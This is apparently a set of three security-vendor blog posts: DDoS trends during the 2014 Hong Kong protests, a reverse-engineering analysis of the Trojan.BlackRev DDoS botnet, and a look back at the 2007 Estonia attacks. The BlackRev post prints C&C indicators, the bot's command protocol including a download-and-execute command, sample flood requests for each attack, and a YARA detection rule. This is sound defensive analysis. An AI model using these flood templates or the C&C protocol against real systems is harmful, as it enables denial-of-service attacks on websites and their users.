DDoS Activity in the Context of Hong Kong’s Pro-democracy Movement

By: Kirk Soluk -

In early August, we examined data demonstrating a striking correlation between real-world and online conflict [1], which ASERT tracks on a continual basis [2-7]. Recent political unrest provides another situation in which strong correlative indicators emerge when conducting time-series analysis of DDoS attack data.

The latest round of pro-democracy protests in Hong Kong began on September 22nd when “. . . Students from 25 schools and universities go ahead with a week-long boycott to protest Beijing’s decision to proceed with indirect elections for Hong Kong’s Chief Executive position.” [8]. The protests ramped up on September 28th when a larger pro-democracy group, Occupy Central with Love and Peace, combined forces with the student demonstrators [8-9]. On October 1st, protesters vowed to increased the level of civil disobedience if Hong Kong’s Chief Executive, Leung Chun-Ying, did not step down [10].  Since that time, tensions have increased, with police crackdowns, tear gas, barricades, skirmishes, shutdowns of government buildings and infrastructure, and heavy use of social media to promote both pro-and anti-protest sentiment.  By examining Arbor ATLAS Internet-wide attack visibility data we have identified DDoS attack activity in the APAC region which correlates strongly with the ebb and flow of protest activity in Hong Kong.

Arbor’s ATLAS Initiative

The DDoS information provided in the remainder of this report is derived from Arbor’s ATLAS Initiative. Arbor ATLAS receives anonymized Internet traffic and DDoS event data from over 290 ISPs worldwide which have deployed Arbor’s DDoS Mitigation solutions.  While many observed events are symptomatic of attacks during this period, it is important to note that we cannot definitively identify the motivations behind any given event.

Hong Kong as a Target of DDoS Attacks (September-October)

Number of Observed DDoS Attacks

The following graph illustrates that the number of observed DDoS attacks targeting Hong Kong-related online properties more than doubled between September and October, from 1,688 discrete attacks in September to 3,565 attacks in October:

Figure 1: Total Number of Attacks Targeting Hong Kong (September and October, 2014)

Figure 1: Total Number of Attacks Targeting Hong Kong (September and October, 2014)

Although the sheer number of DDoS attacks increased significantly from September to October, there was not a significant difference with respect to other attack attributes such as size or duration.  For example, the following charts break out the percentage of DDoS attacks within a given size range for both September and October, along with the raw number of DDoS attacks in that size range:

Figure 2: Percentage of Attacks within a given Size Range

Figure 2: Percentage of Attacks within a given Size Range

Overall, the percentage of DDoS attacks within a given size range remain fairly consistent from September to October, with the biggest difference being a relative 4% decrease in the number of DDoS  attacks within the 2gb/sec-to-5gb/sec range.

In summary, the analysis of the number and size of Hong Kong-related DDoS attacks depicted by Figures 1 and 2 above can be summed up by stating that “October saw more of the same – a lot more!

Size of Attacks and Related News Events

Figure 3 illustrates the largest DDoS attacks per day, in terms of bandwidth, targeting Hong Kong-related online properties during the month of October:

Figure 3: Peak Attack Sizes per Day (Gbps)

Figure 3: Peak Attack Sizes per Day (Gbps)

Three large DDoS attacks on October 14th (45.4gb/sec), 17th (38.3gb/sec), and 19th (45.6gb/sec) stand out. The total number of observed DDoS attacks targeting Hong Kong-related online properties (289, 419, and 427 respectively) also peaked on these days.  Since the vast majority of DDoS events reported via ATLAS are anonymized, it cannot be definitively determined how these specific DDoS attacks were related to the ongoing protests.  However, it appears that these attacks coincide with reports on Twitter and  by the Wall Street Journal of anti-protest crowds attempting to physically prevent pro-democracy newspaper publisher Apple Daily from distributing its newspapers. Specifically, the Journal noted that Apple Daily “simultaneously faced a cyberattack that brought down its email system for hours” [11]. On October 14th, Computerworld Hong Kong quoted an employee from Next Media (Apple Daily’s parent company), as follows: “The network was a total failure, affecting not just Apple Daily, but all the publications under Next Media” [12].

What’s Next?

Based on in-region DDoS attack statistics for the first week of November, continued DDoS attacks on Hong Kong-related Internet properties appear to be taking place. The following graph illustrates peak DDoS attack sizes in the 30gb/sec-plus range on four consecutive days (November 3rd – 6th):

Figure 4: Peak Attack Sizes per Day (Gbps) in the first week of November

Figure 4: Peak Attack Sizes per Day (Gbps) in the first week of November

Conclusion

While establishing definitive causal relationships and attribution are challenging  it is apparent that DDoS attacks have become the ‘new normal’ during periods of political unrest worldwide. In this case, we observed a 111% increase in the number of DDoS attacks targeting Hong Kong-related Internet properties when analyzing the months immediately before and after protester demands, on October 1st, for Hong Kong’s Chief Executive to step down. Additionally, large-scale DDoS attacks were observed targeting Hong Kong-related Internet properties that coincide with reports of debilitating disruptions of online media outlets sympathetic to the protest movement.

References

[1] http://www.arbornetworks.com/asert/2014/08/ddos-and-geopolitics-attack-analysis-in-the-context-of-the-israeli-hamas-conflict/

[2] http://www.arbornetworks.com/asert/2007/12/political-ddos-ukraine-kasparov/

[3] http://www.arbornetworks.com/asert/2013/05/estonia-six-years-later/

[4] ASERT Threat Intelligence Brief 2013-5: Observed Syrian Cyber Adversary Capabilities and Indicators. Available to Arbor customers upon request.

[5] ASERT Threat Intelligence Brief 2013-7: The Impact of Protest Activity on Internet Service in Thailand. Available to Arbor customers upon request.

[6] ASERT Threat Intelligence Brief 2013-4: Potential Targeted Attacks Against Various International Interests. TLP Amber. Available to Arbor customers upon request.

[7] ASERT Threat Intelligence Brief 2014-04: Counter Terrorism Expo and Bulgarian State Agency for National Security Cyber-Threat Alert. TLP Amber. Available to Arbor customers upon request.

[8] http://www.theepochtimes.com/n3/1015132-hong-kong-occupy-central-time-line-of-key-umbrella-movement-events/

[9] http://www.scmp.com/topics/occupy-central

[10] http://www.reuters.com/article/2014/10/01/hongkong-china-idUSL6N0RV5F920141001

[11] http://online.wsj.com/articles/hong-kongs-press-under-siege-1413330960

[12] http://cw.com.hk/news/next-media-under-cyberattack-and-operations-disruption

The Revolution Will Be Written in Delphi

By: Dennis Schwarz -

Since it has been a little while since we profiled a DDoS botnet family on the blog, let’s take a look at Trojan.BlackRev (also known as the “Black Revolution” trojan.) It was named for the Mutex set in early versions of the malware. This family is interesting from a research perspective because there are at least four revisions in the wild showing its progression from a basic DDoS bot to a more advanced one.

Rev MD5 C&C URL C&C IP
1 06d8da1e14cff81ca2fad02d2a878c72 http://userhaos.ru
/113/bot/gate.php
91.105.232.105
2 c9c6aeacee9f973ca0ca5da101a12a16 http://ergoholding.ru
/rev/gate.php
91.204.122.100
2.5 7141cacc3f4a191015a176947a403b79 http://clfrev.ru
/rev/panel/gate.php
93.170.130.112
3 eae553d72142f9dcb06c5c134015fe7a http://ergoholding.ru
/ddd/gate.php
91.204.122.100

The programming language used is Delphi (networking support via the Synapse library), PEiD detects it as version “6.0 – 7.0″ and the Interactive Delphi Reconstructor (IDR) confirms version 7.

As an aside, the latter tool’s IDC Generator helped significantly in reverse engineering these binaries in IDA Pro, thanks much!

Based on the Delphi usage, command and control locations, and the language references in some of the HTTP headers, the nationality of this family is empirically Russian. But, as with all malware attribution, this is highly speculative. It is also unclear whether a single threat actor has access to the source code or whether the code has been released or leaked and multiple actors are making modifications.

Revision 1

Revision 1′s command and control (C&C) is HTTP based. Bots register to the C&C using a request like this:

GET /113/bot/gate.php?reg=lemaaapuzg HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The reg parameter value is set to 10 random lowercase letters.

Here is how bots poll for commands:

GET /113/bot/gate.php?cmd=urls HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C will respond with a “|” delimited message:

command|unknown_integer|unknown_integer2|target|query string or port|

Identified commands:

  • stop – stop attack
  • die – terminate bot process
  • sleep – sleep for one hour
  • http – HTTP GET request flood #1
  • simple – HTTP GET request flood #2
  • loginpost – HTTP POST request flood #1
  • datapost – HTTP POST request flood #2

The following DDoS attacks are implemented in this revision.

Attack – http

A HTTP GET request flood. Here is a sample request:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 266
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset:twindows-1251,utf-8;q=0.7,*;q=0.3
Referer: http://victim.com/
Cookie:tPHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4;

__utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

The Keep-Alive header will be set to a random integer between 0 and 300. The rest of the headers are static.

Attack – simple

A barebones HTTP GET request flood. It uses Synapse’s default GET request and looks like this:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – loginpost

A HTTP POST request flood. The POST request will look like:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 25

login=gxt1$pass=svw3re1aq

The login and pass parameters are separated by the “$”. Both values are set to random lowercase letters and digits. The lengths will be chosen randomly between 0 and 15 characters each.

Attack – datapost

A HTTP POST request flood. A sample request:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 895

r8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsj

For the POST data, a string of lowercase letters and digits is generated. The length will be randomly chosen between 0 and 150. This string will then be repeated 179 times.

Revision 2

Revision 2 of Trojan.BlackRev modifies the C&C communications slightly. The reg parameter is set to 15 random lower and uppercase letters and it uses the following User-Agent:

User-Agent: Mozilla/4.0 (SEObot)

The following layer 4 attack commands were added:

  • syn – TCP connection flood
  • udp – UDP flood #1
  • udpdata – UDP flood #2
  • data – TCP flood
  • icmp – ICMP echo request floods

This revision implements revision 1′s http, simple, loginpost, and datapost attacks with the only difference being that in the latter three, the User-Agent used is:

User-Agent: Mozilla/4.0 (SEObot)

The following are the details of the additional DDoS attacks.

Attack – syn

Per the name, this is supposed to be a TCP SYN flood, but behind the scenes, a TCP connection flood is implemented–complete 3-way handshake.

Attack – udp

A UDP flood where the payload is 16 “F”s.

Attack – udpdata

A UDP flood where the payload is 100 random lowercase letters.

Attack – data

A TCP flood. For the payload, a string of random lowercase letters with a random length of 0 to 100 is generated. This string is repeated 172 times. The concatenated string is then repeated again 35 times.

Attack – icmp

An ICMP echo request or Ping flood. The payload is 44 “7″s.

Revision 2.5

C&C-wise, revision 2.5 is very similar to revision 2. It changes the following commands:

  • http
  • udp
  • udpdata
  • data

This revision adds:

  • tcpdata – TCP flood #1
  • dataget – HTTP GET request flood
  • connect – TCP flood #2
  • dns – resolve IPs

Attack – http

Example request:

GET /index1.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 176
Connection: keep-alive
User-Agent: Android-x86-1.6-r2 - Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
Referer: https://www.google.ru/#hl=ru&gs_rn=9&gs_ri=psy-
ab&tok=TBFEIC6g9ZD8TLHI_O_qEw&cp=5&gs_id=i&xhr=t&q=www.victim1.com&es_nrs=true&pf=p&newwindow=1
&safe=off&output=search&sclient=psy-
ab&oq=site.&gs_l=&pbx=1&bav=on.2,or.r_cp.r_qf.&bvm=bv.45175338,d.bGE&fp=364d6440e7471a0b&biw=
1360&bih=624
Cookie: PHPSESSID=66lf4vv9l8W7engCw6hFmLWShuKAMMuqJICAxiLekLrmAnnmiJ

The Keep-Alive header will be set to a random number between 0 and 300. The Cookie header will be set to “PHPSESSID=” with a value of 50 random uppercase, lowercase, and digits. This revision selects a random User-Agent out of the following 11 possible:

  • Yandex/1.01.001 (compatible; Win16; I)
  • Yandex/1.01.001 (compatible; Win16; P)
  • Yandex/1.02.000 (compatible; Win16; F)
  • Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
  • Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
  • StackRambler/2.0 (MSIE incompatible)
  • StackRambler/2.0
  • Android-x86-1.6-r2 – Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
  • Samsung Galaxy S – Mozilla/5.0 (Linux; U; Android 2.1-update1; ru-ru; GT-I9000 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko)
  • Samsung Galaxy Tab 10.1 Android 3.1 – Mozilla/5.0 (Linux; U; Android 3.1; en-us; GT-P7510 Build/HMJ37) AppleWebKit/534.13 (KHTML, like Gecko)
  • Blackberry OS ?? 4.2 ?? 5 ?????? ? BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179

The rest of the headers are static, including the very specific Referer.

Attack – udp

The UDP payload is interesting. It is 76 bytes in length, and looks like tcpdump output:

[udp sum ok] 60865 FormErr% [0q] 0/0/0 (12) (DF) (ttl 253, id 9987, len 40)

ASERT team member Matt Bing speculated that it might have been copied and pasted from the tcpdump output in this 2005 article on “Understanding the UDP Protocol”

Attack – udpdata

The payload in this variant is 342 “F”s.

Attack – tcpdata

This is a new attack, a TCP flood. The payload is generated like this: a string of 100 random lowercase letters is generated. This string is repeated 172 times. Then, the concatenated string is repeated 35 times.

Attack – data

The data command was changed to launch both the udpdata and tcpdata attacks.

Attack – dns

Repeatedly tries to resolve the target IP via gethostbyaddr() function calls.

Attack – dataget

A new HTTP GET request flood. Example request:

GET /index10.html?
xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u17k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27
jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd005s5hpwerv1=xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u1
7k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd00

5s5hpwerv1$....more of the same... HTTP/1.1
Host: www.victim10.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (SEObot)

The query string is quite long; it is constructed like this: a string of 150 random lowercase letters and digits is generated. This string is used for 18 name/value pairs. At the end, an additional name/value pairs is added where the values is the random string repeated 53 times. Each name/value pair is separated by a “$”.

Attack – connect

A new attack, a TCP flood. On each send() iteration a string of 10 random lowercase letters is generated and appended to the previously generated string. A newline is concatenated to the end.

Revision 3

Revision 3 changes things up a bit. The analyzed binary phones home to the same C&C domain and IP as revision 2, but bot registration now looks like this:

GET /ddd/gate.php?id=idbucwehjhhgjjxxe HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The id parameter will be set to “id” plus 15 random lowercase letters.

Commands in this revision are polled via:

GET /ddd/get HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C response is still pipe delimited, but different:

command|number_of_packets_to_send|URL, IP, hostname, or stop

There are some deletions, additions, and changes to the command set.

Commands removed:

  • die
  • sleep
  • syn
  • udpdata
  • tcpdata
  • data
  • dataget
  • connect

Commands added:

  • exec – download and execute
  • resolve – hostname resolution flood
  • antiddos – HTTP GET request flood — favicon.ico
  • range – HTTP GET request flood — Range header
  • ftp – FTP connection flood
  • download – HTTP GET request flood
  • fastddos – HTTP GET request flood — WinInet functions
  • slowhttp – HTTP GET request flood — possible Slowloris attempt
  • allhttp – launches multiple HTTP floods
  • full – launches multiple floods

Commands changed:

  • http
  • simple
  • loginpost
  • datapost
  • udp

Commands that stayed the same:

  • icmp
  • dns

Below are revision 3′s attacks.

Attack – http

The http attack changed. It is now a HTTP GET and POST flood. The GET request:

GET /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html

And the POST:

POST /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html
Content-Length: 87664

In both, the Keep-Alive header will be set to a random number between 0 and 300. In the POST, the Content-Length header is set to a random number between 0 and 300,000

Attack – simple

The simple attack is slightly different:

GET /index.html HTTP/1.1
Host: www.victim2.com
Connection: close
User-Agent: Opera/9.80

The User-Agent header looks to be a copy and paste typo. This User-Agent is used in some additional attacks as well.

Attack – loginpost

In addition to the below POST request, a simple flood is also started.

POST /index.html HTTP/1.1
Host: www.victim3.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 28

login=g84lkvpk&pass=uOjzq9FJ

Slight differences: the parameters are separated by a “&” instead of a “$” and the values are each set to eight random lowercase letters and digits.

Attack – datapost

A POST request where the data is 100 random lowercase letters.

POST /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 100

bulwmxcytltvczbrgqoedffycczkyedrmoczlkhgjghmwdnveinkkzgncvtojsxhlchddzebspuwcsdeydalowdcewdxrllgzvvt

Attack – udp

The UDP flood routine no longer uses the Synapse Library in this revision. Winsock is used instead. Port 80 is hardcoded and the payload is only two “F”s.

Attack – resolve

Repeatedly tries to resolve the target hostname via gethostbyname() function calls.

Attack – antiddos

A HTTP GET request flood. Two requests are sent on each iteration, the first one being:

GET /index.html HTTP/1.1
Host: www.victim2.com
Keep-Alive: 150
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The second:

GET /index.html/favicon.ico HTTP/1.1
Host: www.victim2.com
Keep-Alive: 47
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto3e45h4rlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The Keep-Alive header is set to a random number between 0 and 300. favicon.ico is automatically added in the second request.

Attack – range

A HTTP GET request flood with a Range header. Possibly an attempt at an ARME/Apache Killer style attack. Sample request:

GET /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
Range: bytes=41-73915
User-Agent: Opera/9.80

The Range start value is a random value between 0 and 100. The stop value is a random value between 0 and 100,000.

Attack – ftp

A FTP connection flood. A sample session:

200 OK
USER 7g6jo5ircx
331 password
PASS s1pvu9yx0r
200 OK
TYPE I
200 OK
STRU F
200 OK
MODE S
200 OK
REST 0
200 OK

The USER and PASS will both be set to 10 random lowercase letters and digits.

Attack – download

A basic HTTP GET request flood:

GET /1.exe HTTP/1.0
Host: www.victim7.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – fastddos

A HTTP GET request flood using the WinInet functions:

GET /index.html HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: google
Host: www.victim8.com
Cache-Control: no-cache

Notice the interesting User-Agent.

Attack – slowhttp

A HTTP GET request flood. Possibly an attempt at a Slowloris attack, but it is not slow at sending data. Here’s what the request looks like:

GET /9.html HTTP/1.0
Host: www.victim9.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)‘=

Attack – allhttp

Launches the following attacks:

  • simple
  • http
  • range
  • loginpost
  • download
  • datapost

Attack – full

Launches the following attacks:

  • icmp
  • udp
  • datapost

Miscellaneous

Besides the C&C and DDoS attacks there are some additional differences and features among the revisions:

  • All four revisions spawn a thread that tries to maintain a small memory footprint via calls to SetProcessWorkingSetSize().
  • Revisions 1 and 2.x try to revoke discretionary access control list (DACL) rights to its binary.
  • Revisions 1 and 2.x enumerate a bunch of directories and then removes files and kills processes based on some tests. The referenced analysis below indicates this might be “botkiller” code.
  • Revision 2.x verifies the embedded C&C by calculating a hash on the URL and comparing it to a hardcoded hash value.
  • Revision 2.x has some built-in monitoring/debugging functionality where the attack commands are echoed back to the C&C via a HTTP GET request to monitor.php.
  • Revision 3 was the first binary to be packed–UPX.
  • Revision 3 maintains persistence via the Registry Run method.
  • The code organization and layout of revision 3 also differs a bit from the other three.

Most of these code paths were glossed over during reversing and a detailed analysis of them are left as an exercise for any interested readers. There is a Russian language malware analysis of revision 2 by the “onthar.in Malware Research Laboratory” that takes a closer look at some of the above and also at an associated dropper malware. It is available at http://onthar.in/articles/black-revolution-ddos-bot-analysis/ (Google Translate does an okay job.)

ASERT has been using the following YARA rule to detect this malware family in our malware zoo:

// blackrev

// Dennis Schwarz, Arbor Networks ASERT
// April 2013

rule blackrev
{
strings:
$base1 = "http"
$base2 = "simple"
$base3 = "loginpost"
$base4 = "datapost"

$opt1 = "blackrev"
$opt2 = "stop"
$opt3 = "die"
$opt4 = "sleep"
$opt5 = "syn"
$opt6 = "udp"
$opt7 = "udpdata"
$opt8 = "icmp"
$opt9 = "antiddos"
$opt10 = "range"
$opt11 = "fastddos"
$opt12 = "slowhttp"
$opt13 = "allhttp"
$opt14 = "tcpdata"
$opt15 = "dataget"

condition:
all of ($base*) and 5 of ($opt*)
}

Conclusion

As we have seen, Trojan.BlackRev is very much a DDoS-specific bot with a rich set of attacks. There are certainly signs that circa April 2013 the code was under active development and the associated campaigns were likely test runs. In addition, the onthar.in analysis notes that they haven’t seen this malware being sold on the underground forums yet. It will be interesting to see how this family will evolve and how active it will become in the wild.

Estonia, six years later

By: Dan Holden -

In April 2007, the Estonian government decided to relocate the Bronze Warrior, a Soviet World War II memorial located in Tallinn, as well as the remains of some Soviet WWII soldiers buried nearby.

This decision caused great offense in Russia, starting at the top. Russian president Vladimir Putin said, “I find that this is an absolutely short-sighted policy, extremist-nationalist, which does not take into consideration the history connected with the fight against Nazism or today’s reality.”

Russia’s foreign minister Sergei Lavrov said Estonia had a “blasphemous attitude towards the memory of those who struggled against fascism.”

Within weeks, the country of Estonia was offline, taken down by a botnet-fueled distributed denial of service (DDoS) attack. This attack impacted both the government and the private sector.

The attacks begin….

Within days of the Estonian government decision, a series of sustained DDoS attacks against Estonian Web properties began.

Estonia’s defense minister at the time, Jaak Aaviksoo, told Wired Magazine:

The attacks were aimed at the essential electronic infrastructure of the Republic of Estonia,” Aaviksoo tells me later. “All major commercial banks, telcos, media outlets, and name servers — the phone books of the Internet — felt the impact, and this affected the majority of the Estonian population. This was the first time that a botnet threatened the national security of an entire nation.”

Two weeks into the attack, Arbor Networks senior security researcher at that time Jose Nazario posted a detailed analysis on our blog, writing,

“All in all, someone is very, very deliberate in putting the hurt on Estonia, and this kind of thing is only going to get more severe in the coming years.”

Within the first two weeks, our Internet-wide threat monitoring system, ATLAS, saw at least 128 separate attacks on nine different Web sites in the country, including 35 attacks against the Estonian police, another 35 attacks against the Ministry of Finance and 36 against the Estonian parliament, Prime Minister as well as other general government Web properties.

  • Attack bandwidths ranged from under 10 Mbps to 95 Mbps, with the majority in the 10-30 Mbps range
  • 75 percent lasted no longer than one hour and 5.5 percent, over 10 hours

So does the speculation….

A high profile disagreement between leaders of Estonia and Russia, followed immediately by a cyber-attack against Estonian Web sites? Well, that can only mean one thing, CYBERWAR!!!

Headlines from May 2007:

Estonia: Ground Zero for World’s First Cyber War?

Estonia hit by ‘Moscow cyber war’

Russia accused of unleashing cyberwar to disable Estonia

Slippery Slopes: Attribution and Semantics

One thing that certainly has not changed since the Estonia incident is that hurried analysis, and attempts at instant attribution, are very rarely accurate.

While the headlines said “cyberwar,” the data that we saw at the time said something else, and that is digital attribution regardless of motive can be extremely difficult. These attacks, like many before and since, were widely distributed around the world. In fact, many of the attacks originated from the United States and elsewhere. There was significant chatter and sharing of attack tools on Russian language Web sites.

Arbor’s ATLAS system and subsequent analysis showed signs of Russian nationalism at work, but no Russian government connection. The sources we analyzed from around the world did not show a clear line from Moscow to Tallinn; instead, it was from everywhere around the world to Estonia. Additionally, we noted at the time that targets were high-profile Web properties, not critical national infrastructure.

As so often happens, after the flurry of initial speculation, the facts settle and the truth comes out, and usually with more than a little snark.

wired

Estonia ‘Cyberwar’ Wasn’t

Sadly, this dashes THREAT LEVEL’s hopes of seeing our own made up infowar term on a CNN graphic.  Since we put it out a week ago, a few more hyperbolic cyberterror gems have surfaced in the coverage of the Estonia packet floods — The First War in Cyberspace!The Future Of Warfare! (exclamation points added) — but the only writer to adopt our Cybarmageddon! was Bruce Sterling.  We’ll let you know if it turns up in his next novel.

There is also a lot of confusion around the term “cyberwar.” What does that mean exactly? One country attacking another seems obvious, but in what respects, what targets, and to what degree? What about when a country leverages experts in the field, as it would with defense contractors, to develop tools and capabilities? Just as there is collaboration between the government and the private sector to develop traditional defense systems and hardware, we must by now realize that the same type of public-private collaboration is happening around the world with regard to cyber capabilities, both defensive and offensive.

I’ll leave the question of what defines a “cyberwar” for others with more patience than I to wax intellectual. What I do know is that geopolitics absolutely shapes the threat landscape and the Internet as we know it today.

Regardless of terminology, we have seen some high profile stories since Estonia. Here are but a few examples that we know about:

April 27, 2007: Attacks on Estonia begin

Week of June 15, 2008Ukraine put under DDoS attack due to NATO protests

August 5, 2008, three days before Georgia launched its invasion of South Ossetia, the Web sites for OSInform News Agency and OSRadio were hacked. Arbor estimates these attacks were in the 814 Mbps range, significantly (at that time) larger than the Estonian DDoS attacks the year before. 

December, 2008 – January, 2009: Israel launched an attack named Operation Cast Lead against the Palestine National Authority. The fighting between the Israeli Defense Forces and Hamas included cyber-attacks against government Web sites and media outlets and involved both State and Non-State actors.

December, 2009 – April, 2010: In the months of unrest leading up to Kyrgyzstan’s second Tulip revolution, the technical unit of Kyrgyzstan intelligence cracked the email account of Gennady Pavlyuk, a leading dissident journalist, to obtain specific data on a project of his, then lured him to Kazakhstan under the pretense of meeting angel investors and killed him.

June 2010: Iran was the victim of a cyber attack when its nuclear facility in Natanz was infiltrated by the now very well-known cyber-worm ‘Stuxnet’.

November 2, 2010: Burma was the victim of a cyber-attack caused by a rapidly escalating, large-scale DDoS  attack targeting Burma’s main Internet provider, the Ministry of Post and Telecommunication (MPT), disrupting most network traffic in and out of the country.

January 2011: Tunisia’s Jasmine Revolution which resulted in the overthrow of a corrupt government, included violent protests and the hacking of user names and passwords for the entire online population of Tunisia by AMMAR, the country’s government-run Internet Services Provider (ISP).

